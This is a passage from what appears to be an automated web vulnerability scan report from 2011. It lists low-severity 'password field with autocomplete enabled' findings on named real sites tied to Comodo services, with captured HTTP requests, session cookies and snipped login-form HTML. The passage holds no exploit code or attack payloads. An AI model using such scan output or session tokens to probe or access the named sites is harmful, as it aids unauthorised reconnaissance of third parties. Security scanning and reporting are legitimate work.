Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:30:38 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.39. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestions

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doMetaQuestions HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart98387ea42c7965f4e9e68c9f?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:45 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.40. https://www.panopticsecurity.com/PCICS/MerController/doReviewMeta

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doReviewMeta

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

POST /PCICS/MerController/doReviewMeta HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers?partner=Comodo
Content-Length: 60
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&answersFine=No+Changes+%28take+me+to+SAQ+D%29

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:32:25 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.41. https://www.panopticsecurity.com/PCICS/MerController/doStart

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doStart

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doStart?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4a271271e63e8096a1c0ea2124e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:15 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.42. https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doUpdateFundamentalAnswers

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doUpdateFundamentalAnswers?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:32:14 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.43. https://www.panopticsecurity.com/PCICS/PanController/doInitUser

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doInitUser

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:32 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.44. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.panopticsecurity.com/Comodo/index.jsp?partner=Comodo
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=c448a660b087763e95615484a201
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:24:31 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 9488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
</tr>
<form action = "/PCICS/PanController/doRegisterUser?partner=Comodo" method = "post" id="userRegistrationForm">
<tr>
...[SNIP]...
<td><input type="password" name="passwordValue" value="" size="32" maxlength="32" tabindex="10"/></td>
...[SNIP]...
<td><input type="password" name="passwordValueConfirm" value="" size="32" maxlength="32" tabindex="11"/></td>
...[SNIP]...

7.45. http://www.trustfax.com/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:36 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:36 GMT
Content-Length: 9335
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</h1> <form id="loginForm" class="form" method="post" action="https://secure.trustfax.com/UnifiedLogin.serv" name="loginForm"> <table border="0" cellspacing="2" cellpadding="1">
...[SNIP]...
<td><input type="password" name="password" /></td>
...[SNIP]...

7.46. http://www.trustix.com/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 3852
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trust
...[SNIP]...
</p>

<form name="loginForm" method="post" action="https://secure.comodo.net/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
<table cellspacing="0" cellpadding="0" >
...[SNIP]...
<td><input type="password" size="20" maxlength="128" onfocus="this.select()" name="loginPassword" /></td>
...[SNIP]...

7.47. http://www.trustix.com/support/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /support/index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /support/index.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 11955
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trustix&
...[SNIP]...
</table>

<form name="form1" method="post" action="https://secure.comodo.net/products/!placeOrder" onsubmit="return checkForm(this);">
<input type="hidden" name="ap" value="trustix" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

7.48. http://www.vengine.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.49. http://www.vengine.com/corporate/about.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/about.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.50. http://www.vengine.com/corporate/contact.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/contact.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.51. http://www.vengine.com/products/best_practices.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/best_practices.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.52. http://www.vengine.com/products/features.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/features.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.53. http://www.vengine.com/products/free_tools.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/free_tools.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.54. http://www.vengine.com/products/overview.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/overview.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.55. http://www.vengine.com/products/prove_it.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/prove_it.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">


Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.56. http://www.vengine.com/products/tour.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/tour.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.57. http://www.vengine.com/products/vengine/eula.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
